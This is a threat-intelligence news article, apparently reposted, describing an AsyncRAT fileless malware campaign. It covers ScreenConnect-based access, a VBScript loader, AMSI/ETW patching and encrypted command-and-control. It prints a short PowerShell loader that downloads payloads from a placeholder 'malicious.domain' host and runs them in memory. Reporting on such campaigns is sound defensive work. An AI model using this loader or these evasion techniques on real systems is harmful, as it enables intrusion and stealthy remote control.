Security researchers have recently observed a surge in sophisticated fileless malware campaigns targeting enterprise environments.
AsyncRAT, a powerful Remote Access Trojan, leverages legitimate system tools to execute malicious payloads entirely in memory, effectively sidestepping traditional disk-based defenses.
Emergence of this threat underscores the evolving tactics employed by cyber adversaries to maintain stealth and persistence on compromised systems.
Initial access in the majority of these attacks is achieved through compromised remote support software. Intruders exploit unauthorized ScreenConnect deployments, gaining interactive control over victim machines.
Once inside, they deploy a multi-stage loader written in VBScript. LevelBlue analysts noted that this loader retrieves two encoded payloads—logs.ldk and logs.ldr—from attacker-controlled servers.
These payloads are never written to disk; instead, they are reflected directly into memory, converting raw byte arrays into executable code at runtime.
AsyncRAT’s architecture revolves around modular .NET assemblies designed for both evasion and core RAT functionality.
LevelBlue researchers identified three principal classes within the first-stage DLL: an entry-point initializer, a persistence manager that creates scheduled tasks disguised as legitimate updaters, and an anti-analysis component that patches AMSI and ETW hooks to disable Windows security logging.
Through dynamic API resolution and in-memory loading, the malware maximizes stealth and complicates forensic analysis.
Beyond obfuscation, AsyncRAT’s second stage—AsyncClient.exe—serves as the command-and-control engine.
Encrypted configuration data within the binary specifies C2 domains, ports, infection flags, and target directories.
Upon decryption with AES-256, the client establishes a TCP socket to its control server, exchanging length-prefixed MessagePack packets.
This protocol supports reconnaissance commands, data exfiltration routines, and remote execution of attacker-supplied instructions.
Infection Mechanism
AsyncRAT’s infection mechanism begins with the execution of a simple VBScript, Update.vbs, launched through WScript.exe.
The script employs the following PowerShell snippet to fetch and execute the loader:
$urls = @("http://malicious.domain/logs.ldk","http://malicious.domain/logs.ldr")
foreach ($u in $urls) {
$bytes = (New-Object Net.WebClient).DownloadData($u)
[Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @())
}This concise loader carries out two critical functions: it decrypts the downloaded binaries and invokes their entry points entirely in memory, leaving no forensic footprint on disk.
By chaining reflection-based loading with anti-analysis routines in the Obfuscator.dll, the attacker ensures that each stage remains hidden from endpoint detection tools.
Subsequent control is handed off to AsyncClient.exe, which maintains persistence and enables full remote administration of the host.
Through this fileless approach, AsyncRAT demonstrates how modern malware can blend legitimate scripting platforms with advanced evasion tactics to compromise and control targeted systems seamlessly.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
